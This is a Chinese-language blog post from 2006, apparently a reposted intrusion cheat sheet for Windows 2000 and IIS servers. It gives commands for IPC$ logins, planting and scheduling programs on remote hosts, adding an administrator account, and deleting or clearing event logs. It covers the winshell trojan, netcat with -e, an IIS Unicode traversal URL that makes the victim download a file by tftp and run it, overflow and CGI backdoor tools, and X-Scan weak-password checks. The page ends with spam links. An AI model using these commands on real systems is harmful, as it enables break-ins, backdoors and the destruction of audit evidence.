<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    鷹翔宇空

    學習和生活

    BlogJava 首頁 新隨筆 聯系 聚合 管理
      110 Posts :: 141 Stories :: 315 Comments :: 1 Trackbacks

    常用的幾條 NET 命令:
    ==================================================
    (與遠程主機建立空管連接) net use \\IP 地址
    \ipc$ "" /use:""
    (以管理員身份登錄遠程主機) net use \\IP 地址 \ipc$ " 密碼
    " /use:"Administrator"
    (傳送文件到遠程主機 WINNT 目錄下) copy 本機目錄路徑 \ 程序 \\IP 地址
    \admin$
    (查看遠程主機時間) net time \\IP 地址

    (定時啟動某個程序) at \\IP 地址
    02:18 readme.exe
    (查看共享) net view \\IP 地址

    (查看 netbios 工作組列表) nbtstat -A IP 地址

    (將遠程主機 C 盤映射為自己的 F 盤) net use f: \\IP 地址
    \c$ ""/user:"Administrator"
    (這兩條把自己增加到管理員組): net user 用戶名 密碼
    /add
    net localgroup Administrators
    用戶名
    /add
    (斷開連接) net use \\IP 地址
    \ipc$ /delete
    擦屁屁:

    del C:\winnt\system32\logfiles\*.*
    del C:\winnt\ssytem32\config\*.evt
    del C:\winnt\system32\dtclog\*.*
    del C:\winnt\system32\*.log
    del C:\winnt\system32\*.txt
    del C:\winnt\*.txt
    del C:\winnt\*.log

    一、
    netsvc.exe

    下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:

    netsvc /list \\IP
    地址

    netsvc schedule \\IP
    地址
    /query
    netsvc \\IP
    地址
    schedule /start


    二、
    OpenTelnet.exe

    遠程啟動主機的 Telnet 服務,并綁定端口到 7878 ,例如:

    OpenTelnet \\IP
    地址 用戶名 密碼
    1 7878
    然后就可以 telnet 到主機的 7878 端口,進入 DOS 方式下:

    telnet IP
    地址
    7878


    三、
    winshell.exe

    一個非常小的木馬(不到 6K ), telnet 到主機的 7878 端口,輸入密碼 winshell ,當看到 CMD> 后,可打下面的命令:

    p Path
    (查看 winshell 主程序的路徑信息)

    b reBoot
    (重新啟動機器)

    d shutDown
    (關閉機器)

    s Shell
    (執行后你就會看到可愛的 “C:\> ”)

    x eXit
    (退出本次登錄會話,此命令并不終止 winshell 的運行)

    CMD>
    http://.../srv.exe
    (通過 http 下載其他網站上的文件到運行 winshell 的機器上)


    四、 3389 登陸器, GUI 方式登錄遠程主機的



    五、
    elsave.exe

    事件日志清除工具

    elsave -s \\IP
    地址
    -l "application" -C
    elsave -s \\IP
    地址
    -l "system" -C
    elsave -s \\IP
    地址
    -l "security" -C
    執行后成功清除應用程序日志,系統日志,安全日志



    六、
    hbulot.exe

    開啟 win2kserver winxp 3389 服務

    hbulot [/r]
    使用 /r 表示安裝完成后自動重起目標使設置生效。



    七、
    nc.exe(netcat.exe)

    一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。

    想要連接到某處
    : nc [-options] hostname port[s] [ports] ...
    綁定端口等待連接
    : nc -l -p port [-options] [hostname] [port]
    參數
    :
    -e prog
    程序重定向,一旦連接,就執行 [ 危險
    !!]
    -g gateway source-routing hop point[s], up to 8
    -G num source-routing pointer: 4, 8, 12, ...
    -h
    幫助信息

    -i secs
    延時的間隔

    -l
    監聽模式,用于入站連接

    -n
    指定數字的 IP 地址,不能用
    hostname
    -o file
    記錄 16 進制的傳輸

    -p port
    本地端口號

    -r
    任意指定本地及遠程端口

    -s addr
    本地源地址

    -u UDP
    模式

    -v
    詳細輸出 —— 用兩個 -v 可得到更詳細的內容

    -w secs timeout
    的時間

    -z
    將輸入輸出關掉 —— 用于掃描時



    八、
    TFTPD32.EXE

    把自己的電腦臨時變為一臺 FTP 服務器,讓肉雞來下載文件, tftp 命令要在肉雞上執行,通常要利用 Unicode 漏洞或 telnet 到肉雞,例如:

    http://IP
    地址 /s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機 IP 地址 get 文件名 c:\winnt\system32\ 文件名
    然后可以直接令文件運行:

    http://IP
    地址 /s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+ 文件名


    九、 prihack.exe IIS printer 遠程緩沖區溢出工具。 idqover.exe 是溢出 idq 的,選擇 溢出后在一個端口監聽 ,然后用 telnet 連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。 xploit.exe 是一個圖形界面的 ida 溢出,成功以后 winxp 下需要打 winxp 。



    一○、 ntis.exe cmd.exe cmdasp.asp 是三個 cgi-backdoor , exe 要放到 cgi-bin 目錄下, asp 放到有 ASP 執行權限的目錄。然后用 IE 瀏覽器連接。



    一、一 Xscan 命令行運行參數說明:


    在檢測過程中,按 "[ 空格 ]" 鍵可以查看各線程狀態及掃描進度,按 "q" 鍵保存當前數據后提前退出程序,按 "<ctrl+c>" 強行關閉程序。


    1.
    命令格式 : xscan -host < 起始 IP>[-< 終止 IP>] < 檢測項目 > [ 其他選項
    ]
    xscan -file <
    主機列表文件名 > < 檢測項目 > [ 其他選項
    ]

    其中 < 檢測項目 > 含義如下
    :
    -port :
    檢測常用服務的端口狀態 ( 可通過 \dat\config.ini 文件的 "PORT-SCAN-OPTIONS\PORT-LIST" 項定制待檢測端口列表 )

    -ftp :
    檢測 FTP 弱口令 ( 可通過 \dat\config.ini 文件設置用戶名 / 密碼字典文件 ) ;

    -ntpass :
    檢測 NT-Server 弱口令 ( 可通過 \dat\config.ini 文件設置用戶名 / 密碼字典文件 )

    -cgi :
    檢測 CGI 漏洞 ( 可通過 \dat\config.ini 文件的 "CGI-ENCODE\encode_type" 項設置編碼方案 )

    -iis :
    檢測 IIS 漏洞 ( 可通過 \dat\config.ini 文件的 "CGI-ENCODE\encode_type" 項設置編碼方案 ) ;


    [
    其他選項 ] 含義如下
    :
    -v:
    顯示詳細掃描進度

    -p:
    跳過 Ping 不通的主機

    -o:
    跳過沒有檢測到開放端口的主機

    -t <
    并發線程數量 [, 并發主機數量 ]>: 指定最大并發線程數量和并發主機數量 , 默認數量為 100,10

    posted on 2006-05-28 11:30 TrampEagle 閱讀(282) 評論(0)  編輯  收藏 所屬分類: 技術文摘
    主站蜘蛛池模板: 亚洲一区二区三区在线观看精品中文 | 亚洲一区免费视频| 最近的中文字幕大全免费版| 最新亚洲人成无码网站| 国产亚洲综合成人91精品| 四虎在线视频免费观看视频| 亚洲爆乳精品无码一区二区| 亚洲日本va中文字幕久久| 在线看片免费不卡人成视频| 青青草97国产精品免费观看| 亚洲天天在线日亚洲洲精| 国产免费一区二区三区VR| 国产拍拍拍无码视频免费| 国产91在线|亚洲| 亚洲综合av永久无码精品一区二区| 四虎1515hh永久久免费| 免费福利在线观看| 亚洲午夜精品在线| 三上悠亚亚洲一区高清| 嫩草影院在线免费观看| 国产无遮挡无码视频免费软件| 亚洲成在人线在线播放无码| 亚洲成AV人片天堂网无码| 国产成人3p视频免费观看 | 毛片免费观看的视频在线| 成人国产精品免费视频| 亚洲熟妇无码AV| 久久国产精品亚洲综合| 免费观看亚洲人成网站| 1000部拍拍拍18免费网站| 国产福利电影一区二区三区,免费久久久久久久精| 亚洲AV无码一区东京热久久 | 毛片高清视频在线看免费观看| 伊人免费在线观看高清版| 亚洲成在人线aⅴ免费毛片| 在线电影你懂的亚洲| 国产精品亚洲综合一区| 色播在线永久免费视频| 国产曰批免费视频播放免费s| 中文字幕在线免费视频| 激情无码亚洲一区二区三区|